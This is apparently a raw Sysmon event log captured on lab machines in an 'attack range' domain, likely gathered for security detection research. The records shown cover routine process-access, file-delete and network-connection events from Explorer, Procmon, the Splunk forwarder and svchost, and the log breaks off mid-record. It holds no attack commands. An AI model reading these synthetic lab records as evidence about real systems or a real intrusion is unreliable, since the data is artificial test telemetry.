10:52:26.469{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.284{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.284{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.284{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.284{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.284{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.284{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.284{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.284{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:26.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5228FAE59B71BBA50CB26AED21B22C5,SHA256=BD559F15DD9CC5DA4B3944B7F50416E4372118AEF4049849FA1195BECBB1867E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:27.689{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1FB73CF7BBC0EEDA4BFA9E35BF0A77B,SHA256=DFE45BB6A6016B7F1585E670177537D7ADEE5BD1EF0BE374E809154D2122413C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:27.347{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:27.347{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:27.347{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:27.031{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D45677B26115DE354B49383C87BED4C,SHA256=50DEDA5A4015B77C2D9D3BFEC1067CFD3AFF960FD1D789FED80C8D98E94B1D72,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:25.632{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51360-false10.0.1.12-8000- 23542300x8000000000000000216922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:28.689{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0781F7BD3AF5B7C9BC756E324B1C0405,SHA256=EA142723A7FF2722CB3B826E25BBA6B165264C632B4D2661C2606BD6BF17A940,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:28.069{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=616F3D2A67E4047AE1C9CAF828EF1AB1,SHA256=6D43713178F85FAAA1202273CB417C764250BECC24B80FC654526069CFF9F825,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:29.783{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311A8378F40BD2AF4AEC4A3CED2F5987,SHA256=FF198E10CDE987A89E48E340D7BBCD88DF5FF220A3A622996B371813E9CFA20B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:27.658{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53498-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000288999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:29.101{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B142F337C3B2359907D22F9D0F631D1,SHA256=9A7764BABAD8C0D461B2C5250DCE1721AD13F2503EEABCB0ABF2BD3DC56CECBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:30.798{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B05A3BB1451E04EB4A89C14E9D40F23,SHA256=9C08C44822AA05E0C4E8EE69A1213986802B105C6DD4B849CE4CA7C8DCEBBDDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:30.116{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA277AAF2F46DA979CE38C86CBD58EA6,SHA256=8A132A062885D86D0BB928328C5DFE02F76C82CBF72850E070A652D70BA01659,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:30.298{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=AFDE77E2FDC29DCD167AC946D10BF0C5,SHA256=40610273E9A00E15705C64AA80F4BB60204F320D2E20F5EA8A0DBA44A54A304D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:30.048{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=158080E8F54489ECC3093BD9FCF8E6CB,SHA256=7C8F2001AB297469A1146AAE6C9F82588B01FC72E0F3CCA80375CCCE0258723B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:30.048{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D68170B72CC60AA6E6C7E13C10A090D5,SHA256=4E3681AC689BFE709F1B23091E8CD1D52997820D81A81FA77ACAAC5F182665CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:31.830{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B458872B1A030DD01500CC63914154AF,SHA256=A6AB041A84F1413C0D6EB7F5161E2A7618283DB63CCC811CE70F29CEAEBF2406,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:31.116{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDC381DDD9781895D914689EE72B2689,SHA256=E64523CA104E6807A413BAB916157B020B7328A98386E02ADB92312DEE2E8A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:32.908{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B342EDF304A7B6CFB1B82D328D484672,SHA256=CB2D3C082EAFF6E9D6AD12CC2C32FDE6869B29B741C3A79CAFED179DD9B002B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:30.648{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51361-false10.0.1.12-8000- 10341000x8000000000000000289005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:32.802{C8EA50B7-F11F-6215-1000-000000003802}3646996C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:32.802{C8EA50B7-F11F-6215-1000-000000003802}3646996C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:32.117{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1C44A7055E1C9010156082ACBEB2A8A,SHA256=7D38D0D230B41E08AD4AA016FEDCA5A8FA31FE95A025249D66147DC927649831,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:33.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F47EBED9044166B7949F5FFD0C43036,SHA256=FCD72F73E4E7D4F6B29B2E630E93ECC1E30D8114E50172B84C97DEE9080292B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:33.349{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8A44F1545B9EF75412E18F98A24B387A,SHA256=39C923ECD253BE1272E8F3D9A280B93EBE4695F847FB367E473A3A48F0170804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:33.118{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68E1662681B2F543E896DAD4CCAA8462,SHA256=4A7D65CD40285BC73D13426FDBAACC30C2696C569798A362E85328F1CF82D845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:34.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06DED0B7BA1ACCA6AC8B96B3B24146F1,SHA256=2DE759519856B555C1778E3CDEAACE0C886D590F12E0ECF0FB40EF2FB078983D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:34.118{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C29903AEB80D3D3ED29AB900AFA6AD,SHA256=8487D095B9975EFD7DBC0417254E6BC0A17FBA6D248CF9757D5E636F44E83C31,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:33.560{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53499-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:35.149{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program 